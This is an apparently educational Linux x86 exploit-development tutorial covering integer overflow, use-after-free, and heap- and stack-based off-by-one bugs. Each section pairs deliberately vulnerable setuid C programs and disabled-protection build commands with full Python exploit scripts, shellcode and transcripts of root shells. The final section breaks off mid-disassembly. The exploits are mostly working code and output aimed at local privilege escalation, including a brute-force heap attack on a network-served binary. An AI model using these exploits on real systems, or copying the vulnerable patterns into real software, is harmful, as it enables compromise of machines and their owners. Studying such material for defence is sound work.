Linux (x86) Exploit Development Series

First of all I would like to thank phrack articles, its author and other security researchers for teaching me about different exploit techniques, without whom none of the posts would have been possible!! I firmly believe that always original reference articles are the best place to learn stuffs. But at times we may struggle to understand it because it may be not be linear and it may be outdated too. So to the best of my efforts, here I have just simplified and conglomerated different exploit techniques under one roof, inorder to provide a complete understanding about linux exploit development to beginners!! Any questions, corrections and feedbacks are most welcomed!! Now buckle up, lets get started!! I have divided this tutorial series in to three levels:

Level 1: Basic Vulnerabilities

In this level I will introduce basic vulnerability classes and also lets travel back in time, to learn how linux exploit development was carried back then. To achieve this time travel, with current linux operating system, I have disabled many security protection mechanisms (like ASLR, Stack Canary, NX and PIE). So in a sense this level is kids stuff, no real fun happens!!

  1. Classic Stack Based Buffer Overflow
  2. Integer Overflow
  3. Off-By-One (Stack Based)

Level 2: Bypassing Exploit Mitigation Techniques 

In this level lets get back to current days, to learn how to bypass different exploit mitigation techniques (like ASLR, Stack CanaryNX and PIE). Real fun do happen here!!

  1. Bypassing NX bit using return-to-libc
  2. Bypassing NX bit using chained return-to-libc
  3. Bypasing ASLR
    1. Part I using return-to-plt
    2. Part II using brute force
    3. Part III using GOT overwrite and GOT dereference

Level 3: Heap Vulnerabilities

In this level lets time travel back and forth, to learn about heap memory corruption bugs.

  1. Heap overflow using unlink
  2. Heap overflow using Malloc Maleficarum
  3. Off-By-One (Heap Based)
  4. Use After Free

NOTE: The above list is NOT a complete list. Few more topics needs to be covered up. I am working on it, so expect it to be posted soon!!

Integer Overflow

VM Setup: Ubuntu 12.04 (x86)

What is Integer Overflow?

Storing a value greater than maximum supported value is called integer overflow. Integer overflow on its own doesnt lead to arbitrary code execution, but an integer overflow might lead to stack overflow or heap overflow which could result in arbitrary code execution. In this post I will be talking ONLY about integer overflow leading to stack overflow, integer overflow leading to heap overflow will be covered up later in a separate post.

Data types size and its range:

When we try to store a value greater than maximum supported value, our value gets wrapped around. For example when we try to store 2147483648 to signed int data type, its gets wrapped around and stored as -21471483648. This is called integer overflow and this overflow could lead to arbitrary code execution!!

Integer underflow

Similarly storing a value lesser than the minimum supported value is called integer underflow. For example when we try to store -2147483649 to signed int data type, its gets wrapped around and stored as 21471483647. This is called integer underflow. Here I will be talking only about integer overflow, but the procedure remains same for underflows too!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void store_passwd_indb(char* passwd) {
}

void validate_uname(char* uname) {
}

void validate_passwd(char* passwd) {
 char passwd_buf[11];
 unsigned char passwd_len = strlen(passwd); /* [1] */ 
 if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
  printf("Valid Password\n"); /* [3] */ 
  fflush(stdout);
  strcpy(passwd_buf,passwd); /* [4] */
 } else {
  printf("Invalid Password\n"); /* [5] */
  fflush(stdout);
 }
 store_passwd_indb(passwd_buf); /* [6] */
}

int main(int argc, char* argv[]) {
 if(argc!=3) {
  printf("Usage Error:   \n");
  fflush(stdout);
  exit(-1);
 }
 validate_uname(argv[1]);
 validate_passwd(argv[2]);
 return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Line [1] of the above vulnerable program shows us that an integer overflow bug exists. strlen()’s return type is size_t (unsigned int) which gets stored in unsigned char data type. Hence any value greater than maximum supported value of unsigned char leads to integer overflow. Thus when the password length is 261, 261 gets wrapped around and stored as 5 in ‘passwd_len’ variable!! Because of this integer overflow, bounds checking performed at line [2] can be bypassed, thus resulting in stack based buffer overflow!!! And as seen in this post, stack based buffer overflow leads to arbitrary code execution.

Before looking into the exploit code, for better understanding, lets disassemble and draw the stack layout for vulnerable code!!

Disassembly:

(gdb) disassemble validate_passwd 
Dump of assembler code for function validate_passwd:
 //Function Prologue
 0x0804849e <+0>: push %ebp                               //backup caller's ebp
 0x0804849f <+1>: mov %esp,%ebp                           //set callee's ebp to esp

 0x080484a1 <+3>: push %edi                               //backup edi
 0x080484a2 <+4>: sub $0x34,%esp                          //stack space for local variables
 0x080484a5 <+7>: mov 0x8(%ebp),%eax                      //eax = passwd
 0x080484a8 <+10>: movl $0xffffffff,-0x1c(%ebp)           //String Length Calculation -- Begins here
 0x080484af <+17>: mov %eax,%edx
 0x080484b1 <+19>: mov $0x0,%eax
 0x080484b6 <+24>: mov -0x1c(%ebp),%ecx
 0x080484b9 <+27>: mov %edx,%edi
 0x080484bb <+29>: repnz scas %es:(%edi),%al
 0x080484bd <+31>: mov %ecx,%eax
 0x080484bf <+33>: not %eax
 0x080484c1 <+35>: sub $0x1,%eax                          //String Length Calculation -- Ends here
 0x080484c4 <+38>: mov %al,-0x9(%ebp)                     //passwd_len = al
 0x080484c7 <+41>: cmpb $0x3,-0x9(%ebp)                   //if(passwd_len <= 4 )
 0x080484cb <+45>: jbe 0x8048500 <validate_passwd+98>     //jmp to 0x8048500
 0x080484cd <+47>: cmpb $0x8,-0x9(%ebp)                   //if(passwd_len >=8)
 0x080484d1 <+51>: ja 0x8048500 <validate_passwd+98>      //jmp to 0x8048500
 0x080484d3 <+53>: movl $0x8048660,(%esp)                 //else arg = format string "Valid Password"
 0x080484da <+60>: call 0x80483a0 <puts@plt>              //call puts
 0x080484df <+65>: mov 0x804a020,%eax                     //eax = stdout 
 0x080484e4 <+70>: mov %eax,(%esp)                        //arg = stdout
 0x080484e7 <+73>: call 0x8048380 <fflush@plt>            //call fflush
 0x080484ec <+78>: mov 0x8(%ebp),%eax                     //eax = passwd
 0x080484ef <+81>: mov %eax,0x4(%esp)                     //arg2 = passwd
 0x080484f3 <+85>: lea -0x14(%ebp),%eax                   //eax = passwd_buf
 0x080484f6 <+88>: mov %eax,(%esp)                        //arg1 = passwd_buf
 0x080484f9 <+91>: call 0x8048390 <strcpy@plt>            //call strcpy
 0x080484fe <+96>: jmp 0x8048519 <validate_passwd+123>    //jmp to 0x8048519
 0x08048500 <+98>: movl $0x804866f,(%esp)                 //arg = format string "Invalid Password"
 0x08048507 <+105>: call 0x80483a0 <puts@plt>             //call puts
 0x0804850c <+110>: mov 0x804a020,%eax                    //eax = stdout
 0x08048511 <+115>: mov %eax,(%esp)                       //arg = stdout
 0x08048514 <+118>: call 0x8048380 <fflush@plt>           //fflush
 0x08048519 <+123>: lea -0x14(%ebp),%eax                  //eax = passwd_buf
 0x0804851c <+126>: mov %eax,(%esp)                       //arg = passwd_buf
 0x0804851f <+129>: call 0x8048494                        //call store_passwd_indb

 //Function Epilogue
 0x08048524 <+134>: add $0x34,%esp                        //unwind stack space
 0x08048527 <+137>: pop %edi                              //restore edi
 0x08048528 <+138>: pop %ebp                              //restore ebp
 0x08048529 <+139>: ret                                   //return
End of assembler dump.
(gdb)

Stack Layout:

As we already know a password of length 261, bypasses bounds checking and allows us to overwrite the return address located in stack. Lets test it out by sending a series of A’s.

Test Step 1: Is Return Address Overwrite possible?

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/iof/vuln...(no debugging symbols found)...done.
(gdb) r sploitfun `python -c 'print "A"*261'`
Starting program: /home/sploitfun/lsploits/iof/vuln sploitfun `python -c 'print "A"*261'`
Valid Password

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

Test Step 2: What is the offset from Destination Buffer?

Here lets find out at what offset return address is located from buffer ‘passwd_buf’. Having disassembled and drawn the stack layout for validate_passwd(), lets now try to find offset location information!! Stack Layout shows that return address is located at offset (0x18) from buffer ‘passwd_buf’. 0x18 is calculated as follows:

0x18 = 0xb + 0x1 + 0x4 + 0x4 + 0x4

where

  • 0xb is ‘passwd_buf’ size
  • 0x1 is ‘passwd_len’ size
  • 0x4 is alignment space
  • 0x4 is edi
  • 0x4 is caller’s EBP

Thus user input of form “A” * 24 + “B” * 4 + “C” * 233, overwrites passwd_buf, passwd_len, alignment space, edi and caller’s ebp with “A”‘s, return address with “BBBB” and remaining space with C’s.

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/iof/vuln...(no debugging symbols found)...done.
(gdb) r sploitfun `python -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/sploitfun/lsploits/iof/vuln sploitfun `python -c 'print "A"*24 + "B"*4 + "C"*233'`
Valid Password

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

Above output shows that attacker gets control over return address. Return address located at stack location (0xbffff1fc) is overwritten with “BBBB”. With these informations, lets write an exploit program to achieve arbitrary code execution.

Exploit Code:

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

arg1 = "sploitfun"

#Stack address where shellcode is copied.
ret_addr = 0xbffff274

#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# arg2 = Junk + RA + NOP's + Shellcode
arg2 = "A" * 24
arg2 += conv(ret_addr);
arg2 += "\x90" * 100
arg2 += scode
arg2 += "C" * 108

print "Calling vulnerable program"
call(["./vuln", arg1, arg2])

Executing above exploit program gives us root shell (as shown below):

$ python exp.py 
Calling vulnerable program
Valid Password
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Reference:

1. http://phrack.org/issues/60/10.html

Use-After-Free

Prerequisite: 

  1. Off-By-One Vulnerability (Heap Based)
  2. Understanding glibc malloc

VM Setup: Fedora 20 (x86)

What is use-after-free (UaF)?

Continuing to use a heap memory pointer which is already been freed is called use-after-free bug!! This bug can lead to arbitrary code execution.

Vulnerable Code:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE1 1020
#define BUFSIZE2 ((BUFSIZE1/2) - 4)

int main(int argc, char **argv) {

 char* name = malloc(12); /* [1] */
 char* details = malloc(12); /* [2] */
 strncpy(name, argv[1], 12-1); /* [3] */
 free(details); /* [4] */
 free(name);  /* [5] */
 printf("Welcome %s\n",name); /* [6] */
 fflush(stdout);

 char* tmp = (char *) malloc(12); /* [7] */
 char* p1 = (char *) malloc(BUFSIZE1); /* [8] */
 char* p2 = (char *) malloc(BUFSIZE1); /* [9] */
 free(p2); /* [10] */
 char* p2_1 = (char *) malloc(BUFSIZE2); /* [11] */
 char* p2_2 = (char *) malloc(BUFSIZE2); /* [12] */

 printf("Enter your region\n");
 fflush(stdout);
 read(0,p2,BUFSIZE1-1); /* [13] */
 printf("Region:%s\n",p2); 
 free(p1); /* [14] */
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

NOTE: Unlike previous post, ASLR is turned ON here. So now lets exploit an UaF bug and since ASLR is turned on, lets bypass it using information leakage and brute force technique.

Above vulnerable code contains two use-after-free bugs at lines [6] and [13]. Their respective heap memories are freed in lines [5] and [10] but their pointers are used even after free ie) in lines [6] and [13]!! Line[6]’s UaF leads to information leakage while Line[13]’s UaF leads to arbitrary code execution.

What is information leakage? How attacker leverages it?

In our vulnerable code (at line [6]), the information that is getting leaked is heap address. This leaked heap address will help the attacker to easily calculate the randomized heap segment’s base address, thus defeating ASLR!!!

To understand how heap address is getting leaked, let us first understand the first half of the vulnerable code.

  • Line [1] allocates a 16 byte heap memory region for ‘name’.
  • Line [2] allocates a 16 byte heap memory region for ‘details’.
  • Line [3] copies program argument 1 (argv[1]) into heap memory region ‘name’.
  • Line [4] and [5] releases heap memory regions ‘name’ and ‘details’ back to glibc malloc.
  • Line [6]’s printf uses ‘name’ pointer after its freed, this leads to leaking heap address.

Having read the prerequisite post, we know that chunks corresponding to ‘name’ and ‘details’ pointers are fast chunks and when these fast chunks are freed, they get stored in index zero of fast bins. We also know that each fast bin contains a single linked list of free chunks. Thus as per our example, fast bin index zero’s single linked list looks as shown below:

main_arena.fastbinsY[0] ---> 'name_chunk_address' ---> 'details_chunk_address' ---> NULL

Because of this single linking, first four bytes of ‘name’ contains ‘details_chunk’ address. Thus when ‘name’ gets printed, ‘details chunk’ address gets printed first.  From the heap layout we know that ‘details chunk’ is located at offset 0x10 from the heap base address. Thus subtracting 0x10 from the leaked heap address, gives us the heap base address!!

How arbitrary code execution is achieved?

Now having obtained the randomized heap segment’s base address, let us see how arbitrary code execution is achieved by understanding the second half of the vulnerable code.

  • Line [7] allocates a 16 byte heap memory region for ‘tmp’.
  • Line [8] allocates a 1024 byte heap memory region for ‘p1’.
  • Line [9] allocates a 1024 byte heap memory region for ‘p2’.
  • Line [10] releases heap memory region ‘p2’ back to glibc malloc.
  • Line [11] allocates a 512 byte heap memory region for ‘p2_1’.
  • Line [12] allocates a 512 byte heap memory region for ‘p2_2’.
  • Line [13]’s read uses ‘p2’ pointer after its freed.
  • Line [14] releases heap memory region ‘p1’ back to glibc malloc, this leads to arbitrary code execution when program exits.

Having read the prerequisite post, we know that when ‘p2’ gets released to glibc malloc, its gets consolidated into top chunk. Later when memory is requested for ‘p2_1’, it is allocated from top chunk – ‘p2’ and ‘p2_1’ contains the same heap address. Further when memory is requested for ‘p2_2’, it is allocated from top chunk – ‘p2_2’ is 512 bytes away from ‘p2’. Thus when ‘p2’ pointer is used after free in line [13], attacker controlled data (of max 1019 bytes) gets copied into p2_1 whose size is only 512 bytes and hence the remaining attacker data overwrites the next chunk ‘p2_2’, allowing the attacker to overwrite the next chunk header’s size field!!

Heap Layout:

As seen in this prerequisite post, if attacker can successfully overwrite the LSB of next chunk’s size field, he can trick glibc malloc to unlink chunk ‘p2_1’ even when its in allocated state. Also in the same post we saw that unlinking a large chunk which is in allocated state can lead to arbitrary code execution when attacker has carefully crafted a fake chunk header!! Attacker constructs the fake chunk header as said below:

  • fd should point back to freed chunk address. From the heap layout we find that ‘p2_1’ is located at offset 0x410. Hence fd = heap_base_address (obtained from information leakage bug) + 0x410.
  • bk also should point back to freed chunk address. From the heap layout we find that ‘p2_1’ is located at offset 0x410. Hence fd = heap_base_address (obtained from information leakage bug) + 0x410.
  • fd_nextsize should point to tls_dtor_list – 0x14. ‘tls_dtor_list’ belongs to glibc’s private anonymous mapping segment which is randomized. Hence to defeat this randomization lets use brute force technique as shown in below exploit code.
  • bk_nextsize should point to heap address which contains a dtor_list element!! ‘system’ dtor_list is injected by the attacker after this fake chunk header, while ‘setuid’ dtor_list is injected by the attacker in place of ‘p2_2’ heap memory region. From the heap layout we know that ‘system’ and setuid’ dtor_list’s are  located at offset 0x428 and 0x618 respectively.

With all these informations, lets write an exploit program to attack the vulnerable binary ‘vuln’!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
import sys
import telnetlib
import time

ip = '127.0.0.1'
port = 1234

def conv(num): return struct.pack("<I", num)

def send(data):
 global con
 con.write(data)
 return con.read_until('\n')

print "** Bruteforcing libc base address**"
libc_base_addr = 0xb756a000
fd_nextsize = (libc_base_addr - 0x1000) + 0x6c0
system = libc_base_addr + 0x3e6e0
system_arg = 0x80482ae
size = 0x200
setuid = libc_base_addr + 0xb9e30
setuid_arg = 0x0

while True:
 time.sleep(4)
 con = telnetlib.Telnet(ip, port)
 laddress = con.read_until('\n')
 laddress = laddress[8:12]
 heap_addr_tup = struct.unpack("<I", laddress)
 heap_addr = heap_addr_tup[0]
 print "** Leaked heap addresses : [0x%x] **" %(heap_addr)
 heap_base_addr = heap_addr - 0x10
 fd = heap_base_addr + 0x410
 bk = fd
 bk_nextsize = heap_base_addr + 0x618
 mp = heap_base_addr + 0x18
 nxt = heap_base_addr + 0x428

 print "** Constructing fake chunk to overwrite tls_dtor_list**"
 fake_chunk = conv(fd)
 fake_chunk += conv(bk)
 fake_chunk += conv(fd_nextsize)
 fake_chunk += conv(bk_nextsize)
 fake_chunk += conv(system)
 fake_chunk += conv(system_arg)
 fake_chunk += "A" * 484
 fake_chunk += conv(size)
 fake_chunk += conv(setuid)
 fake_chunk += conv(setuid_arg)
 fake_chunk += conv(mp)
 fake_chunk += conv(nxt)
 print "** Successful tls_dtor_list overwrite gives us shell!!**"
 send(fake_chunk)

 try: 
  con.interact()
 except: 
  exit(0)

Since in brute force technique we need to make multiple attempts (until we succeed) lets run our vulnerable binary ‘vuln’ as a network server and using a shell script lets make sure its gets restarted automatically when it gets crashed!!

#vuln.sh
#!/bin/sh
nc_process_id=$(pidof nc)
while :
do
 if [[ -z $nc_process_id ]]; then
 echo "(Re)starting nc..."
 nc -l -p 1234 -c "./vuln sploitfun"
 else
 echo "nc is running..."
 fi
done

Executing above exploit code gives us root shell!! Bingo!!

Shell-1$./vuln.sh
Shell-2$python exp.py
...
** Leaked heap addresses : [0x889d010] **
** Constructing fake chunk to overwrite tls_dtor_list**
** Successfull tls_dtor_list overwrite gives us shell!!**
*** Connection closed by remote host ***
** Leaked heap addresses : [0x895d010] **
** Constructing fake chunk to overwrite tls_dtor_list**
** Successfull tls_dtor_list overwrite gives us shell!!**
*** Connection closed by remote host ***
id
uid=0(root) gid=1000(bala) groups=0(root),10(wheel),1000(bala) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
exit
** Leaked heap addresses : [0x890c010] **
** Constructing fake chunk to overwrite tls_dtor_list**
** Successfull tls_dtor_list overwrite gives us shell!!**
*** Connection closed by remote host ***
...
$

Reference:

1. Revisiting Defcon CTF Shitsco Use-After-Free Vulnerability – Remote Code Execution

Off-By-One Vulnerability (Heap Based)

Prerequisite: 

  1. Off-By-One Vulnerability (Stack Based)
  2. Understanding glibc malloc

VM Setup: Fedora 20 (x86)

What is off-by-one bug?

As said in this post, copying source string into destination buffer could result in off-by-one when

  1. Source string length is equal to destination buffer length.

When source string length is equal to destination buffer length, a single NULL byte gets copied just above the destination buffer. Here since the destination buffer is located in heap, the single NULL byte could overwrite the chunk header of next chunk and this could lead to arbitrary code execution.

Recap: As said in this post, a heap segment is divided into multiple chunk as per users heap memory request. Each chunk has its own chunk header (represented by malloc_chunk). Structure malloc_chunk contains following four elements:

  1. prev_size – If the previous chunk is free, this field contains the size of previous chunk. Else if previous chunk is allocated, this field contains previous chunk’s user data.
  2. size : This field contains the size of this allocated chunk. Last 3 bits of this field contains flag information.
    • PREV_INUSE (P) – This bit is set when previous chunk is allocated.
    • IS_MMAPPED (M) – This bit is set when chunk is mmap’d.
    • NON_MAIN_ARENA (N) – This bit is set when this chunk belongs to a thread arena.
  3. fd – Points to next chunk in the same bin.
  4. bk – Points to previous chunk in the same bin.

Vulnerable Code:

//consolidate_forward.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define SIZE 16

int main(int argc, char* argv[])
{

 int fd = open("./inp_file", O_RDONLY); /* [1] */
 if(fd == -1) {
 printf("File open error\n");
 fflush(stdout);
 exit(-1);
 }

 if(strlen(argv[1])>1020) { /* [2] */
 printf("Buffer Overflow Attempt. Exiting...\n");
 exit(-2);
 }

 char* tmp = malloc(20-4); /* [3] */
 char* p = malloc(1024-4); /* [4] */
 char* p2 = malloc(1024-4); /* [5] */
 char* p3 = malloc(1024-4); /* [6] */

 read(fd,tmp,SIZE); /* [7] */
 strcpy(p2,argv[1]); /* [8] */

 free(p); /* [9] */
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -o consolidate_forward consolidate_forward.c
$sudo chown root consolidate_forward
$sudo chgrp root consolidate_forward
$sudo chmod +s consolidate_forward

NOTE: ASLR is turned off for our demo purposes. In case if you want to want to bypass ASLR too use information leakage bug or brute force technique as described in this post.

Line [2] and [8] of the above vulnerable code is where the heap based off-by-one overflow could occur. Destination buffer length is 1020 and hence source string of length 1020 bytes could lead to arbitrary code execution.

How arbitrary code execution is achieved?

Arbitrary code execution is achieved when a single null byte overwrites the chunk header of next chunk (‘p3’). When a chunk of size 1020 bytes (‘p2’) gets overflown by a single byte, next chunk (‘p3’) header’s size’s least significant byte gets overwritten with NULL byte and not prev_size’s least significant byte.

Why LSB of size gets overwritten instead of prev_size’s LSB?

checked_request2size converts user requested size into usable size (internal representation size) since some extra space is needed for storing malloc_chunk and also for alignment purposes. Conversion takes place in such a way that last 3 bits of usable size is never set and hence its used for storing flag informations P, M and N.

Thus when malloc(1020) gets executed in our vulnerable code, user request size of 1020 bytes gets converted to ((1020 + 4 + 7) & ~7) 1024 bytes (internal representation size) . Overhead for an allocated chunk of 1020 bytes is only 4 bytes!! But for an allocated chunk we need chunk header of size 8 bytes, inorder to store prev_size and size informations. Thus first 8 bytes of the1024 byte chunk will be used for chunk header, but now we are left with only 1016 (1024-8) bytes for user data instead of 1020 bytes. But as said above in prev_size definition, if previous chunk (‘p2’) is allocated, chunk’s (‘p3’) prev_size field contains user data. Thus prev_size of the chunk (‘p3’) located next to this allocated 1024 byte chunk (‘p2’) contains the remaining 4 bytes of user data!! This is the reason why LSB of size gets overwritten with single NULL byte instead of prev_size!!

Heap Layout:

NOTE: Attacker data in the above picture will be explained in “Overwriting tls_dtor_list” section below!!

Now getting back to our original question

How arbitrary code execution is achieved?

Now we know that on off-by-one error, single null byte overwrites the LSB of next chunk’s (‘p3’) size field. This single NULL byte overwrite means the flag information of that chunk (‘p3’) gets cleared ie) the overflown chunk (‘p2’) becomes free, despite being in allocated state. This state of inconsistency drives glibc code to unlink a chunk (‘p2’) which is already in allocated state when chunk previous (‘p’) to overflown chunk (‘p2’) gets freed!!

As seen in this post, unlinking a chunk which is already in allocated state could lead to arbitrary code execution since any four byte memory region could be written with attacker’s data!! But in the same post, we also saw unlink technique became obsolete because glibc got hardened over the years!! In particular because of the condition “corrupted double linked list“, arbitrary code execution wasn’t possible!!

But in late 2014, google’s project zero team found out a way to successfully bypass “corrupted double linked list” condition by unlinking a large chunk!!

Unlink:

#define unlink(P, BK, FD) { 
  FD = P->fd; 
  BK = P->bk;
  // Primary circular double linked list hardening - Run time check
  if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) /* [1] */
   malloc_printerr (check_action, "corrupted double-linked list", P); 
  else { 
   // If we have bypassed primary circular double linked list hardening, below two lines helps us to overwrite any 4 byte memory region with arbitrary data!!
   FD->bk = BK; /* [2] */
   BK->fd = FD; /* [3] */
   if (!in_smallbin_range (P->size) 
   && __builtin_expect (P->fd_nextsize != NULL, 0)) { 
    // Secondary circular double linked list hardening - Debug assert
    assert (P->fd_nextsize->bk_nextsize == P);  /* [4] */
        assert (P->bk_nextsize->fd_nextsize == P); /* [5] */
    if (FD->fd_nextsize == NULL) { 
     if (P->fd_nextsize == P) 
      FD->fd_nextsize = FD->bk_nextsize = FD; 
     else { 
      FD->fd_nextsize = P->fd_nextsize; 
      FD->bk_nextsize = P->bk_nextsize; 
      P->fd_nextsize->bk_nextsize = FD; 
      P->bk_nextsize->fd_nextsize = FD; 
     } 
    } else { 
     // If we have bypassed secondary circular double linked list hardening, below two lines helps us to overwrite any 4 byte memory region with arbitrary data!!
     P->fd_nextsize->bk_nextsize = P->bk_nextsize; /* [6] */
     P->bk_nextsize->fd_nextsize = P->fd_nextsize; /* [7] */
    } 
   } 
  } 
}

In glibc malloc, primary circular double linked list is maintained by fd and bk fields of malloc_chunk while secondary circular double linked linked is maintained by fd_nextsize and bk_nextsize fields of malloc_chunk. It looks like corrupted double linked list hardening is applied to both primary (line [1]) and secondary (lines [4] and [5]) double linked list, but hardening for secondary circular double linked list is only a debug assert statement (and NOT a runtime check like primary circular double linked list hardening) which doesnt get compiled into production build (atleast in fedora (x86) machines). Thus secondary circular double linked list hardening (lines [4] and [5]) as no significance, which allows us to write arbitrary data to any 4 byte memory region (lines [6] and [7]).

Still few things are to be cleared up, so lets see here in more detail of how unlinking a large chunk leads to arbitrary code execution!! Since attacker has control over – to be freed large chunk, he overwrites malloc_chunk elements as said below:

  • fd should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • bk also should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • fd_nextsize should point to free_got_addr – 0x14
  • bk_nextsize should point to system_addr

But lines [6] and [7], wants both fd_nextsize and bk_nextsize to be writable. fd_nextsize is writable (since it points to free_got_addr – 0x14) but bk_nextsize isnt writable since it points to system_addr which belongs to text segment of libc.so!!  This problem of wanting both fd_nextsize and bk_nextsize to be writable is solved by overwriting tls_dtor_list.

Overwriting tls_dtor_list:

tls_dtor_list is a thread-local variable which contains a list of function pointers to be invoked during exit(). __call_tls_dtors walks through tls_dtor_list and invokes the function one by one!! Thus if we can overwrite tls_dtor_list with a heap address which contains system and system_arg in place of func and obj of dtor_list, system() could be invoked!!

Thus now attacker overwrites, to be freed large chunk’s malloc_chunk elements as said below:

  • fd should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • bk also should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • fd_nextsize should point to tls_dtor_list – 0x14
  • bk_nextsize should point to heap address which contains a dtor_list element!!

– Problem of fd_nextsize being writable is solved since tls_dtor_list belongs to writable segment of libc.so and by disassembling __call_tls_dtors(), tls_dtor_list address is found out to be at 0xb7fe86d4.

– Problem of bk_next size being writable is solved since it points to heap address.

With all these informations, lets write an exploit program to attack the vulnerable binary ‘consolidate_forward’!!

Exploit Code:

#exp_try.py
#!/usr/bin/env python
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b430
system = 0x4e0a86e0
sh = 0x80482ce

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing above exploit code doesnt gives us root shell, it gives us a bash shell running at our own privilege level. Hmmm…

$ python -c 'print "A"*16' > inp_file
$ python exp_try.py 
Calling vulnerable program
sh-4.2$ id
uid=1000(sploitfun) gid=1000(sploitfun) groups=1000(sploitfun),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2$ exit
exit
$

Why root shell wasn’t obtained?

/bin/bash drops off privileges when uid != euid. Our binary ‘consolidate _forward”s real uid = 1000 and its effective uid = 0. Hence when system() gets invoked bash drops off the privileges since real uid != effective uid!! To solve this problem we need to invoke setuid(0) before system() and since _call_tls_dtors() walks through tls_dtor_list one by one, we need to chain setuid() and system() inorder to obtain root shell!!

Full Exploit Code:

#gen_file.py
#!/usr/bin/env python
import struct

#dtor_list
setuid = 0x4e123e30
setuid_arg = 0x0
mp = 0x804b020
nxt = 0x804b430

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

tst = conv(setuid)
tst += conv(setuid_arg)
tst += conv(mp)
tst += conv(nxt)

print tst
-----------------------------------------------------------------------------------------------------------------------------------
#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b008
system = 0x4e0a86e0
sh = 0x80482ce

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing above exploit code gives us root shell!!

$ python gen_file.py > inp_file
$ python exp.py 
Calling vulnerable program
sh-4.2# id
uid=0(root) gid=1000(sploitfun) groups=0(root),10(wheel),1000(sploitfun) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
$

Our off-by-one vulnerable code consolidates chunks in forward direction, similarly chunks can also be consolidated in backward direction. Such off-by-one vulnerable codes which consolidates chunks in backward direction can also be exploited!!

Off-By-One Vulnerability (Stack Based)

Prerequisite:

  1. Classic Stack Based Buffer Overflow 

VM Setup: Ubuntu 12.04 (x86)

What is off-by-one bug?

Copying source string into destination buffer could result in off-by-one when

  1. Source string length is equal to destination buffer length.

When source string length is equal to destination buffer length, a single NULL byte gets copied just above the destination buffer. Here since the destination buffer is located in stack, the single NULL byte could overwrite the least significant bit (LSB) of caller’s EBP stored in the stack and this could lead to arbitrary code execution.

As always enough of definitions, lets look into an off-by-one vulnerable code!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

void foo(char* arg);
void bar(char* arg);

void foo(char* arg) {
 bar(arg); /* [1] */
}

void bar(char* arg) {
 char buf[256];
 strcpy(buf, arg); /* [2] */
}

int main(int argc, char *argv[]) {
 if(strlen(argv[1])>256) { /* [3] */
  printf("Attempted Buffer Overflow\n");
  fflush(stdout);
  return -1;
 }
 foo(argv[1]); /* [4] */
 return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Line [2] of the above vulnerable code is where the off-by-one overflow could occur. Destination buffer length is 256 and hence source string of length 256 bytes could lead to arbitrary code execution.

How arbitrary code execution is achieved?

Arbitrary code execution is achieved using a technique called “EBP overwrite”. If callers’s EBP is located just above the destination buffer then after strcpy, a single NULL byte would have overwritten the LSB of caller’s EBP. To understand more about off-by-one lets disassemble vulnerable code and draw the stack layout for it.

Disassembly:

 (gdb) disassemble main
Dump of assembler code for function main:
 //Function Prologue
 0x08048497 <+0>: push %ebp                    //backup caller's ebp
